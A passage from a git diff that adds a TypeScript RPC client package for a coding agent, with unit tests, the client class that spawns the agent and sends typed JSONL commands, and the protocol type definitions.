stream.write('{"a":1}\n'); + await new Promise((r) => setTimeout(r, 10)); + assert.equal(lines.length, 1); + + detach(); + + stream.write('{"b":2}\n'); + stream.end(); + await new Promise((r) => setTimeout(r, 10)); + + // Should still be 1 — detach removed listeners + assert.equal(lines.length, 1); + }); + + it("strips CR from CRLF line endings", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"v":1}\r\n'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 1); + assert.equal(JSON.parse(lines[0]).v, 1); + }); +}); + +// ============================================================================ +// Type Shape Tests +// ============================================================================ + +describe("type shapes", () => { + it("RpcInitResult has protocolVersion, sessionId, capabilities", () => { + const init: RpcInitResult = { + protocolVersion: 2, + sessionId: "sess_123", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["prompt", "steer"], + }, + }; + assert.equal(init.protocolVersion, 2); + assert.equal(init.sessionId, "sess_123"); + assert.ok(Array.isArray(init.capabilities.events)); + assert.ok(Array.isArray(init.capabilities.commands)); + }); + + it("RpcExecutionCompleteEvent has required fields", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run_abc", + status: "completed", + stats: { + sessionFile: "/tmp/session.json", + sessionId: "sess_123", + userMessages: 5, + assistantMessages: 5, + toolCalls: 3, + toolResults: 3, + totalMessages: 10, + tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100, total: 1800 }, + cost: 0.05, + }, + }; + assert.equal(event.type, "execution_complete"); + assert.equal(event.runId, "run_abc"); + assert.equal(event.status, "completed"); + assert.ok(event.stats); + assert.equal(event.stats.sessionId, "sess_123"); + }); + + it("RpcCostUpdateEvent has required fields", () => { + const event: RpcCostUpdateEvent = { + type: "cost_update", + runId: "run_abc", + turnCost: 0.01, + cumulativeCost: 0.05, + tokens: { input: 500, output: 200, cacheRead: 100, cacheWrite: 50 }, + }; + assert.equal(event.type, "cost_update"); + assert.equal(event.runId, "run_abc"); + assert.equal(event.turnCost, 0.01); + assert.equal(event.cumulativeCost, 0.05); + assert.ok(event.tokens); + }); + + it("SessionStats has all expected fields", () => { + const stats: SessionStats = { + sessionFile: "/tmp/session.json", + sessionId: "s1", + userMessages: 10, + assistantMessages: 10, + toolCalls: 5, + toolResults: 5, + totalMessages: 20, + tokens: { input: 2000, output: 1000, cacheRead: 500, cacheWrite: 200, total: 3700 }, + cost: 0.10, + }; + assert.equal(stats.sessionId, "s1"); + assert.equal(stats.userMessages, 10); + assert.equal(stats.tokens.total, 3700); + assert.equal(stats.cost, 0.10); + }); + + it("RpcProtocolVersion accepts 1 and 2", () => { + const v1: RpcProtocolVersion = 1; + const v2: RpcProtocolVersion = 2; + assert.equal(v1, 1); + assert.equal(v2, 2); + }); + + it("RpcV2Event discriminated union covers both event types", () => { + const events: RpcV2Event[] = [ + { + type: "execution_complete", + runId: "r1", + status: "completed", + stats: { + sessionFile: undefined, + sessionId: "s1", + userMessages: 1, + assistantMessages: 1, + toolCalls: 0, + toolResults: 0, + totalMessages: 2, + tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, total: 150 }, + cost: 0.001, + }, + }, + { + type: "cost_update", + runId: "r1", + turnCost: 0.001, + cumulativeCost: 0.001, + tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 }, + }, + ]; + assert.equal(events.length, 2); + assert.equal(events[0].type, "execution_complete"); + assert.equal(events[1].type, "cost_update"); + }); +}); + +// ============================================================================ +// RpcClient Construction Tests +// ============================================================================ + +describe("RpcClient construction", () => { + it("creates with default options", () => { + const client = new RpcClient(); + assert.ok(client); + }); + + it("creates with custom options", () => { + const client = new RpcClient({ + cliPath: "/usr/local/bin/gsd", + cwd: "/tmp", + env: { NODE_ENV: "test" }, + provider: "anthropic", + model: "claude-sonnet", + args: ["--verbose"], + }); + assert.ok(client); + }); +}); + +// ============================================================================ +// events() Generator Tests +// ============================================================================ + +describe("events() async generator", () => { + it("yields events from a mock stream in order", async () => { + const client = new RpcClient(); + + // Reach into the client to set up a mock process with a PassThrough stdout + const mockStdout = new PassThrough(); + const mockStderr = new PassThrough(); + const mockStdin = new PassThrough(); + + // Simulate a started process by setting internal state + // We use Object.assign to set private fields for testing + const clientAny = client as any; + clientAny.process = { + stdout: mockStdout, + stderr: mockStderr, + stdin: mockStdin, + exitCode: null, + kill: () => {}, + on: (event: string, handler: (...args: any[]) => void) => { + if (event === "exit") { + // Store exit handler so we can trigger it + clientAny._testExitHandler = handler; + } + }, + removeListener: () => {}, + }; + + // Attach the JSONL reader like start() does + clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => { + clientAny.handleLine(line); + }); + + // Collect events from the generator + const received: SdkAgentEvent[] = []; + const genPromise = (async () => { + for await (const event of client.events()) { + received.push(event); + if (event.type === "done") break; + } + })(); + + // Simulate server sending events + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "agent_start", runId: "r1" })); + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "token", text: "hello" })); + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "done" })); + + await genPromise; + + assert.equal(received.length, 3); + assert.equal(received[0].type, "agent_start"); + assert.equal(received[1].type, "token"); + assert.equal(received[2].type, "done"); + }); + + it("terminates when process exits", async () => { + const client = new RpcClient(); + const mockStdout = new PassThrough(); + const mockStderr = new PassThrough(); + const mockStdin = new PassThrough(); + + const exitHandlers: Array<() => void> = []; + const clientAny = client as any; + clientAny.process = { + stdout: mockStdout, + stderr: mockStderr, + stdin: mockStdin, + exitCode: null, + kill: () => {}, + on: (event: string, handler: () => void) => { + if (event === "exit") exitHandlers.push(handler); + }, + removeListener: (event: string, handler: () => void) => { + const idx = exitHandlers.indexOf(handler); + if (idx !== -1) exitHandlers.splice(idx, 1); + }, + }; + + clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => { + clientAny.handleLine(line); + }); + + const received: SdkAgentEvent[] = []; + const genPromise = (async () => { + for await (const event of client.events()) { + received.push(event); + } + })(); + + // Send one event, then simulate process exit + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "agent_start" })); + await new Promise((r) => setTimeout(r, 20)); + + // Fire exit handlers + for (const h of exitHandlers) h(); + + await genPromise; + + assert.equal(received.length, 1); + assert.equal(received[0].type, "agent_start"); + }); + + it("throws if client not started", async () => { + const client = new RpcClient(); + await assert.rejects(async () => { + // eslint-disable-next-line @typescript-eslint/no-unused-vars + for await (const _event of client.events()) { + // should not reach + } + }, /Client not started/); + }); +}); + +// ============================================================================ +// sendUIResponse Serialization Test +// ============================================================================ + +describe("sendUIResponse serialization", () => { + it("writes correct JSONL to stdin", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + client.sendUIResponse("ui_1", { value: "hello" }); + + assert.equal(chunks.length, 1); + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.id, "ui_1"); + assert.equal(parsed.value, "hello"); + }); + + it("serializes confirmed response", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + client.sendUIResponse("ui_2", { confirmed: true }); + + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.confirmed, true); + assert.equal(parsed.id, "ui_2"); + }); + + it("serializes cancelled response", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + client.sendUIResponse("ui_3", { cancelled: true }); + + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.cancelled, true); + }); +}); + +// ============================================================================ +// init/shutdown/subscribe Serialization Tests +// ============================================================================ + +describe("v2 command serialization", () => { + // Helper: capture what the client sends to stdin + function createMockClient(): { client: RpcClient; sent: any[]; respondNext: (data?: any) => void } { + const client = new RpcClient(); + const sent: any[] = []; + let respondFn: ((data: any) => void) | null = null; + + const clientAny = client as any; + clientAny.process = { + stdin: { + write: (data: string) => { + const parsed = JSON.parse(data.trim()); + sent.push(parsed); + // Auto-respond with success after a tick + if (respondFn) { + setTimeout(() => respondFn!(parsed), 5); + } + return true; + }, + }, + stderr: new PassThrough(), + exitCode: null, + kill: () => {}, + on: () => {}, + removeListener: () => {}, + }; + + const respondNext = (overrides: any = {}) => { + respondFn = (parsed) => { + const response = { + type: "response", + id: parsed.id, + command: parsed.type, + success: true, + data: {}, + ...overrides, + }; + clientAny.handleLine(JSON.stringify(response)); + }; + }; + + return { client, sent, respondNext }; + } + + it("init sends correct v2 init command", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext({ data: { protocolVersion: 2, sessionId: "s1", capabilities: { events: [], commands: [] } } }); + + const result = await client.init({ clientId: "test-app" }); + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "init"); + assert.equal(sent[0].protocolVersion, 2); + assert.equal(sent[0].clientId, "test-app"); + assert.equal(result.protocolVersion, 2); + assert.equal(result.sessionId, "s1"); + }); + + it("shutdown sends shutdown command", async () => { + const { client, sent, respondNext } = createMockClient(); + + // Override the process exit wait + const clientAny = client as any; + const originalProcess = clientAny.process; + const exitHandlers: Array<(code: number) => void> = []; + clientAny.process = { + ...originalProcess, + on: (event: string, handler: (code: number) => void) => { + if (event === "exit") exitHandlers.push(handler); + }, + }; + + respondNext(); + + // Call shutdown and simulate process exit + const shutdownPromise = client.shutdown(); + await new Promise((r) => setTimeout(r, 20)); + for (const h of exitHandlers) h(0); + + await shutdownPromise; + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "shutdown"); + }); + + it("subscribe sends subscribe command with event list", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext(); + + await client.subscribe(["execution_complete", "cost_update"]); + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "subscribe"); + assert.deepEqual(sent[0].events, ["execution_complete", "cost_update"]); + }); + + it("subscribe with wildcard", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext(); + + await client.subscribe(["*"]); + + assert.equal(sent[0].events.length, 1); + assert.equal(sent[0].events[0], "*"); + }); +}); diff --git a/packages/rpc-client/src/rpc-client.ts b/packages/rpc-client/src/rpc-client.ts new file mode 100644 index 000000000..4d5edc53c --- /dev/null +++ b/packages/rpc-client/src/rpc-client.ts @@ -0,0 +1,666 @@ +/** + * RPC Client for programmatic access to the coding agent. + * + * Spawns the agent in RPC mode and provides a typed API for all operations. + * This is a standalone SDK client — all types are inlined with zero internal + * package dependencies. + */ + +import { type ChildProcess, spawn } from "node:child_process"; +import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; +import type { + BashResult, + CompactionResult, + ImageContent, + ModelInfo, + RpcCommand, + RpcInitResult, + RpcResponse, + RpcSessionState, + RpcSlashCommand, + ThinkingLevel, + SessionStats, +} from "./rpc-types.js"; + +// ============================================================================ +// Types +// ============================================================================ + +/** Distributive Omit that works with union types */ +type DistributiveOmit = T extends unknown ? Omit : never; + +/** RpcCommand without the id field (for internal send) */ +type RpcCommandBody = DistributiveOmit; + +/** Agent event — a loosely-typed record from the server. The `type` field is always present. */ +export interface SdkAgentEvent { + type: string; + [key: string]: unknown; +} + +export interface RpcClientOptions { + /** Path to the CLI entry point (default: searches for dist/cli.js) */ + cliPath?: string; + /** Working directory for the agent */ + cwd?: string; + /** Environment variables */ + env?: Record; + /** Provider to use */ + provider?: string; + /** Model ID to use */ + model?: string; + /** Additional CLI arguments */ + args?: string[]; +} + +export type RpcEventListener = (event: SdkAgentEvent) => void; + +// ============================================================================ +// RPC Client +// ============================================================================ + +export class RpcClient { + private process: ChildProcess | null = null; + private stopReadingStdout: (() => void) | null = null; + private _stderrHandler?: (data: Buffer) => void; + private eventListeners: RpcEventListener[] = []; + private pendingRequests: Map void; reject: (error: Error) => void }> = + new Map(); + private requestId = 0; + private stderr = ""; + private _stopped = false; + + constructor(private options: RpcClientOptions = {}) {} + + /** + * Start the RPC agent process. + */ + async start(): Promise { + if (this.process) { + throw new Error("Client already started"); + } + + this._stopped = false; + + const cliPath = this.options.cliPath ?? "dist/cli.js"; + const args = ["--mode", "rpc"]; + + if (this.options.provider) { + args.push("--provider", this.options.provider); + } + if (this.options.model) { + args.push("--model", this.options.model); + } + if (this.options.args) { + args.push(...this.options.args); + } + + this.process = spawn("node", [cliPath, ...args], { + cwd: this.options.cwd, + env: { ...process.env, ...this.options.env }, + stdio: ["pipe", "pipe", "pipe"], + }); + + // Collect stderr for debugging + this._stderrHandler = (data: Buffer) => { + this.stderr += data.toString(); + }; + this.process.stderr?.on("data", this._stderrHandler); + + // Set up strict JSONL reader for stdout. + this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => { + this.handleLine(line); + }); + + // Detect unexpected subprocess exit and reject all pending requests + this.process.on("exit", (code, signal) => { + if (this.pendingRequests.size > 0) { + const reason = signal ? `signal ${signal}` : `code ${code}`; + const error = new Error(`Agent process exited unexpectedly (${reason}). Stderr: ${this.stderr}`); + for (const [id, pending] of this.pendingRequests) { + this.pendingRequests.delete(id); + pending.reject(error); + } + } + }); + + // Wait a moment for process to initialize + await new Promise((resolve) => setTimeout(resolve, 100)); + + if (this.process.exitCode !== null) { + throw new Error(`Agent process exited immediately with code ${this.process.exitCode}. Stderr: ${this.stderr}`); + } + } + + /** + * Stop the RPC agent process. + */ + async stop(): Promise { + if (!this.process) return; + + this._stopped = true; + + this.stopReadingStdout?.(); + this.stopReadingStdout = null; + if (this._stderrHandler) { + this.process.stderr?.removeListener("data", this._stderrHandler); + this._stderrHandler = undefined; + } + this.process.kill("SIGTERM"); + + // Wait for process to exit + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 1000); + + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + + this.process = null; + this.pendingRequests.clear(); + } + + /** + * Subscribe to agent events via callback. + */ + onEvent(listener: RpcEventListener): () => void { + this.eventListeners.push(listener); + return () => { + const index = this.eventListeners.indexOf(listener); + if (index !== -1) { + this.eventListeners.splice(index, 1); + } + }; + } + + /** + * Async generator that yields agent events as they arrive. + * + * Usage: + * ```ts + * for await (const event of client.events()) { + * console.log(event.type, event); + * } + * ``` + * + * The generator terminates when: + * - `stop()` is called + * - The agent process exits + * - The consumer breaks out of the loop + */ + async *events(): AsyncGenerator { + if (!this.process) { + throw new Error("Client not started — call start() before events()"); + } + + if (this._stopped) { + return; + } + + const buffer: SdkAgentEvent[] = []; + let resolve: ((value: void) => void) | null = null; + let done = false; + + // When a new event arrives, either push to buffer or wake up the awaiting generator + const listener = (event: SdkAgentEvent) => { + buffer.push(event); + if (resolve) { + const r = resolve; + resolve = null; + r(); + } + }; + + // When the process exits, signal the generator to stop + const onExit = () => { + done = true; + if (resolve) { + const r = resolve; + resolve = null; + r(); + } + }; + + const unsubscribe = this.onEvent(listener); + this.process.on("exit", onExit); + + try { + while (!done && !this._stopped) { + // Drain buffer first + while (buffer.length > 0) { + yield buffer.shift()!; + } + + // If done after draining, break + if (done || this._stopped) { + break; + } + + // Wait for next event or process exit + await new Promise((r) => { + resolve = r; + }); + } + + // Drain any remaining events that arrived with the exit signal + while (buffer.length > 0) { + yield buffer.shift()!; + } + } finally { + unsubscribe(); + this.process?.removeListener("exit", onExit); + } + } + + /** + * Get collected stderr output (useful for debugging). + */ + getStderr(): string { + return this.stderr; + } + + // ========================================================================= + // Command Methods + // ========================================================================= + + /** + * Send a prompt to the agent. + * Returns immediately after sending; use onEvent() or events() to receive streaming events. + * Use waitForIdle() to wait for completion. + */ + async prompt(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "prompt", message, images }); + } + + /** + * Queue a steering message to interrupt the agent mid-run. + */ + async steer(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "steer", message, images }); + } + + /** + * Queue a follow-up message to be processed after the agent finishes. + */ + async followUp(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "follow_up", message, images }); + } + + /** + * Abort current operation. + */ + async abort(): Promise { + await this.send({ type: "abort" }); + } + + /** + * Start a new session, optionally with parent tracking. + * @param parentSession - Optional parent session path for lineage tracking + * @returns Object with `cancelled: true` if an extension cancelled the new session + */ + async newSession(parentSession?: string): Promise<{ cancelled: boolean }> { + const response = await this.send({ type: "new_session", parentSession }); + return this.getData(response); + } + + /** + * Get current session state. + */ + async getState(): Promise { + const response = await this.send({ type: "get_state" }); + return this.getData(response); + } + + /** + * Set model by provider and ID. + */ + async setModel(provider: string, modelId: string): Promise<{ provider: string; id: string }> { + const response = await this.send({ type: "set_model", provider, modelId }); + return this.getData(response); + } + + /** + * Cycle to next model. + */ + async cycleModel(): Promise<{ + model: { provider: string; id: string }; + thinkingLevel: ThinkingLevel; + isScoped: boolean; + } | null> { + const response = await this.send({ type: "cycle_model" }); + return this.getData(response); + } + + /** + * Get list of available models. + */ + async getAvailableModels(): Promise { + const response = await this.send({ type: "get_available_models" }); + return this.getData<{ models: ModelInfo[] }>(response).models; + } + + /** + * Set thinking level. + */ + async setThinkingLevel(level: ThinkingLevel): Promise { + await this.send({ type: "set_thinking_level", level }); + } + + /** + * Cycle thinking level. + */ + async cycleThinkingLevel(): Promise<{ level: ThinkingLevel } | null> { + const response = await this.send({ type: "cycle_thinking_level" }); + return this.getData(response); + } + + /** + * Set steering mode. + */ + async setSteeringMode(mode: "all" | "one-at-a-time"): Promise { + await this.send({ type: "set_steering_mode", mode }); + } + + /** + * Set follow-up mode. + */ + async setFollowUpMode(mode: "all" | "one-at-a-time"): Promise { + await this.send({ type: "set_follow_up_mode", mode }); + } + + /** + * Compact session context. + */ + async compact(customInstructions?: string): Promise { + const response = await this.send({ type: "compact", customInstructions }); + return this.getData(response); + } + + /** + * Set auto-compaction enabled/disabled. + */ + async setAutoCompaction(enabled: boolean): Promise { + await this.send({ type: "set_auto_compaction", enabled }); + } + + /** + * Set auto-retry enabled/disabled. + */ + async setAutoRetry(enabled: boolean): Promise { + await this.send({ type: "set_auto_retry", enabled }); + } + + /** + * Abort in-progress retry. + */ + async abortRetry(): Promise { + await this.send({ type: "abort_retry" }); + } + + /** + * Execute a bash command. + */ + async bash(command: string): Promise { + const response = await this.send({ type: "bash", command }); + return this.getData(response); + } + + /** + * Abort running bash command. + */ + async abortBash(): Promise { + await this.send({ type: "abort_bash" }); + } + + /** + * Get session statistics. + */ + async getSessionStats(): Promise { + const response = await this.send({ type: "get_session_stats" }); + return this.getData(response); + } + + /** + * Export session to HTML. + */ + async exportHtml(outputPath?: string): Promise<{ path: string }> { + const response = await this.send({ type: "export_html", outputPath }); + return this.getData(response); + } + + /** + * Switch to a different session file. + * @returns Object with `cancelled: true` if an extension cancelled the switch + */ + async switchSession(sessionPath: string): Promise<{ cancelled: boolean }> { + const response = await this.send({ type: "switch_session", sessionPath }); + return this.getData(response); + } + + /** + * Fork from a specific message. + * @returns Object with `text` (the message text) and `cancelled` (if extension cancelled) + */ + async fork(entryId: string): Promise<{ text: string; cancelled: boolean }> { + const response = await this.send({ type: "fork", entryId }); + return this.getData(response); + } + + /** + * Get messages available for forking. + */ + async getForkMessages(): Promise> { + const response = await this.send({ type: "get_fork_messages" }); + return this.getData<{ messages: Array<{ entryId: string; text: string }> }>(response).messages; + } + + /** + * Get text of last assistant message. + */ + async getLastAssistantText(): Promise { + const response = await this.send({ type: "get_last_assistant_text" }); + return this.getData<{ text: string | null }>(response).text; + } + + /** + * Set the session display name. + */ + async setSessionName(name: string): Promise { + await this.send({ type: "set_session_name", name }); + } + + /** + * Get all messages in the session. + * Messages are returned as opaque objects — the internal structure may vary. + */ + async getMessages(): Promise { + const response = await this.send({ type: "get_messages" }); + return this.getData<{ messages: unknown[] }>(response).messages; + } + + /** + * Get available commands (extension commands, prompt templates, skills). + */ + async getCommands(): Promise { + const response = await this.send({ type: "get_commands" }); + return this.getData<{ commands: RpcSlashCommand[] }>(response).commands; + } + + /** + * Send a UI response to a pending extension_ui_request. + * Fire-and-forget — no request/response correlation. + */ + sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + this.process.stdin.write(serializeJsonLine({ + type: "extension_ui_response", + id, + ...response, + })); + } + + /** + * Initialize a v2 protocol session. Must be sent as the first command. + * Returns the negotiated protocol version, session ID, and server capabilities. + */ + async init(options?: { clientId?: string }): Promise { + const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId }); + return this.getData(response); + } + + /** + * Request a graceful shutdown of the agent process. + * Waits for the response before the process exits. + */ + async shutdown(): Promise { + await this.send({ type: "shutdown" }); + // Wait for process to exit after shutdown acknowledgment + if (this.process) { + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 5000); + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + } + } + + /** + * Subscribe to specific event types (v2 only). + * Pass ["*"] to receive all events, or a list of event type strings to filter. + */ + async subscribe(events: string[]): Promise { + await this.send({ type: "subscribe", events }); + } + + // ========================================================================= + // Helpers + // ========================================================================= + + /** + * Wait for agent to become idle (no streaming). + * Resolves when agent_end event is received. + */ + waitForIdle(timeout = 60000): Promise { + return new Promise((resolve, reject) => { + const timer = setTimeout(() => { + unsubscribe(); + reject(new Error(`Timeout waiting for agent to become idle. Stderr: ${this.stderr}`)); + }, timeout); + + const unsubscribe = this.onEvent((event) => { + if (event.type === "agent_end") { + clearTimeout(timer); + unsubscribe(); + resolve(); + } + }); + }); + } + + /** + * Collect events until agent becomes idle. + */ + collectEvents(timeout = 60000): Promise { + return new Promise((resolve, reject) => { + const events: SdkAgentEvent[] = []; + const timer = setTimeout(() => { + unsubscribe(); + reject(new Error(`Timeout collecting events. Stderr: ${this.stderr}`)); + }, timeout); + + const unsubscribe = this.onEvent((event) => { + events.push(event); + if (event.type === "agent_end") { + clearTimeout(timer); + unsubscribe(); + resolve(events); + } + }); + }); + } + + /** + * Send prompt and wait for completion, returning all events. + */ + async promptAndWait(message: string, images?: ImageContent[], timeout = 60000): Promise { + const eventsPromise = this.collectEvents(timeout); + await this.prompt(message, images); + return eventsPromise; + } + + // ========================================================================= + // Internal + // ========================================================================= + + private handleLine(line: string): void { + try { + const data = JSON.parse(line); + + // Check if it's a response to a pending request + if (data.type === "response" && data.id && this.pendingRequests.has(data.id)) { + const pending = this.pendingRequests.get(data.id)!; + this.pendingRequests.delete(data.id); + pending.resolve(data as RpcResponse); + return; + } + + // Otherwise it's an event — dispatch to listeners + for (const listener of this.eventListeners) { + listener(data as SdkAgentEvent); + } + } catch { + // Ignore non-JSON lines + } + } + + private async send(command: RpcCommandBody): Promise { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + + const id = `req_${++this.requestId}`; + const fullCommand = { ...command, id } as RpcCommand; + + return new Promise((resolve, reject) => { + const timeout = setTimeout(() => { + this.pendingRequests.delete(id); + reject(new Error(`Timeout waiting for response to ${command.type}. Stderr: ${this.stderr}`)); + }, 30000); + + this.pendingRequests.set(id, { + resolve: (response) => { + clearTimeout(timeout); + resolve(response); + }, + reject: (error) => { + clearTimeout(timeout); + reject(error); + }, + }); + + this.process!.stdin!.write(serializeJsonLine(fullCommand)); + }); + } + + private getData(response: RpcResponse): T { + if (!response.success) { + const errorResponse = response as Extract; + throw new Error(errorResponse.error); + } + // Type assertion: we trust response.data matches T based on the command sent. + const successResponse = response as Extract; + return successResponse.data as T; + } +} diff --git a/packages/rpc-client/src/rpc-types.ts b/packages/rpc-client/src/rpc-types.ts new file mode 100644 index 000000000..be8bca73b --- /dev/null +++ b/packages/rpc-client/src/rpc-types.ts @@ -0,0 +1,399 @@ +/** + * RPC protocol types for headless operation. + * + * Commands are sent as JSON lines on stdin. + * Responses and events are emitted as JSON lines on stdout. + * + * This file is self-contained — all types that were previously imported from + * internal packages are inlined so that this package has zero internal + * dependencies. + */ + +// ============================================================================ +// Inlined types (originally from internal packages) +// ============================================================================ + +/** Thinking budget level (inlined from agent-core) */ +export type ThinkingLevel = "off" | "minimal" | "low" | "medium" | "high" | "xhigh"; + +/** Image attachment (inlined from pi-ai) */ +export interface ImageContent { + type: "image"; + data: string; // base64 encoded image data + mimeType: string; // e.g., "image/jpeg", "image/png" +} + +/** Model descriptor — opaque for SDK consumers */ +export interface ModelInfo { + provider: string; + id: string; + contextWindow?: number; + reasoning?: boolean; + [key: string]: unknown; +} + +/** Session statistics (from agent-session.ts) */ +export interface SessionStats { + sessionFile: string | undefined; + sessionId: string; + userMessages: number; + assistantMessages: number; + toolCalls: number; + toolResults: number; + totalMessages: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + total: number; + }; + cost: number; +} + +/** Bash command result (from bash-executor.ts) */ +export interface BashResult { + /** Combined stdout + stderr output (sanitized, possibly truncated) */ + output: string; + /** Process exit code (undefined if killed/cancelled) */ + exitCode: number | undefined; + /** Whether the command was cancelled via signal */ + cancelled: boolean; + /** Whether the output was truncated */ + truncated: boolean; + /** Path to temp file containing full output (if output exceeded truncation threshold) */ + fullOutputPath?: string; +} + +/** Compaction result (from compaction.ts) */ +export interface CompactionResult { + summary: string; + firstKeptEntryId: string; + tokensBefore: number; + /** Extension-specific data (e.g., ArtifactIndex, version markers for structured compaction) */ + details?: T; +} + +// ============================================================================ +// RPC Protocol Versioning +// ============================================================================ + +/** Supported protocol versions. v1 is the implicit default; v2 requires an init handshake. */ +export type RpcProtocolVersion = 1 | 2; + +// ============================================================================ +// RPC Commands (stdin) +// ============================================================================ + +export type RpcCommand = + // Prompting + | { id?: string; type: "prompt"; message: string; images?: ImageContent[]; streamingBehavior?: "steer" | "followUp" } + | { id?: string; type: "steer"; message: string; images?: ImageContent[] } + | { id?: string; type: "follow_up"; message: string; images?: ImageContent[] } + | { id?: string; type: "abort" } + | { id?: string; type: "new_session"; parentSession?: string } + + // State + | { id?: string; type: "get_state" } + + // Model + | { id?: string; type: "set_model"; provider: string; modelId: string } + | { id?: string; type: "cycle_model" } + | { id?: string; type: "get_available_models" } + + // Thinking + | { id?: string; type: "set_thinking_level"; level: ThinkingLevel } + | { id?: string; type: "cycle_thinking_level" } + + // Queue modes + | { id?: string; type: "set_steering_mode"; mode: "all" | "one-at-a-time" } + | { id?: string; type: "set_follow_up_mode"; mode: "all" | "one-at-a-time" } + + // Compaction + | { id?: string; type: "compact"; customInstructions?: string } + | { id?: string; type: "set_auto_compaction"; enabled: boolean } + + // Retry + | { id?: string; type: "set_auto_retry"; enabled: boolean } + | { id?: string; type: "abort_retry" } + + // Bash + | { id?: string; type: "bash"; command: string } + | { id?: string; type: "abort_bash" } + + // Session + | { id?: string; type: "get_session_stats" } + | { id?: string; type: "export_html"; outputPath?: string } + | { id?: string; type: "switch_session"; sessionPath: string } + | { id?: string; type: "fork"; entryId: string } + | { id?: string; type: "get_fork_messages" } + | { id?: string; type: "get_last_assistant_text" } + | { id?: string; type: "set_session_name"; name: string } + + // Messages + | { id?: string; type: "get_messages" } + + // Commands (available for invocation via prompt) + | { id?: string; type: "get_commands" } + + // Bridge-hosted native terminal + | { id?: string; type: "terminal_input"; data: string } + | { id?: string; type: "terminal_resize"; cols: number; rows: number } + | { id?: string; type: "terminal_redraw" } + + // v2 Protocol + | { id?: string; type: "init"; protocolVersion: 2; clientId?: string } + | { id?: string; type: "shutdown"; graceful?: boolean } + | { id?: string; type: "subscribe"; events: string[] }; + +// ============================================================================ +// RPC Slash Command (for get_commands response) +// ============================================================================ + +/** A command available for invocation via prompt */ +export interface RpcSlashCommand { + /** Command name (without leading slash) */ + name: string; + /** Human-readable description */ + description?: string; + /** What kind of command this is */ + source: "extension" | "prompt" | "skill"; + /** Where the command was loaded from (undefined for extensions) */ + location?: "user" | "project" | "path"; + /** File path to the command source */ + path?: string; +} + +// ============================================================================ +// RPC State +// ============================================================================ + +export interface RpcSessionState { + model?: ModelInfo; + thinkingLevel: ThinkingLevel; + isStreaming: boolean; + isCompacting: boolean; + steeringMode: "all" | "one-at-a-time"; + followUpMode: "all" | "one-at-a-time"; + sessionFile?: string; + sessionId: string; + sessionName?: string; + autoCompactionEnabled: boolean; + autoRetryEnabled: boolean; + retryInProgress: boolean; + retryAttempt: number; + messageCount: number; + pendingMessageCount: number; + /** Whether extension loading has completed. Commands from `get_commands` may be incomplete until true. */ + extensionsReady: boolean; +} + +// ============================================================================ +// RPC Responses (stdout) +// ============================================================================ + +// Success responses with data +export type RpcResponse = + // Prompting (async - events follow) + | { id?: string; type: "response"; command: "prompt"; success: true; runId?: string } + | { id?: string; type: "response"; command: "steer"; success: true; runId?: string } + | { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string } + | { id?: string; type: "response"; command: "abort"; success: true } + | { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } } + + // State + | { id?: string; type: "response"; command: "get_state"; success: true; data: RpcSessionState } + + // Model + | { + id?: string; + type: "response"; + command: "set_model"; + success: true; + data: ModelInfo; + } + | { + id?: string; + type: "response"; + command: "cycle_model"; + success: true; + data: { model: ModelInfo; thinkingLevel: ThinkingLevel; isScoped: boolean } | null; + } + | { + id?: string; + type: "response"; + command: "get_available_models"; + success: true; + data: { models: ModelInfo[] }; + } + + // Thinking + | { id?: string; type: "response"; command: "set_thinking_level"; success: true } + | { + id?: string; + 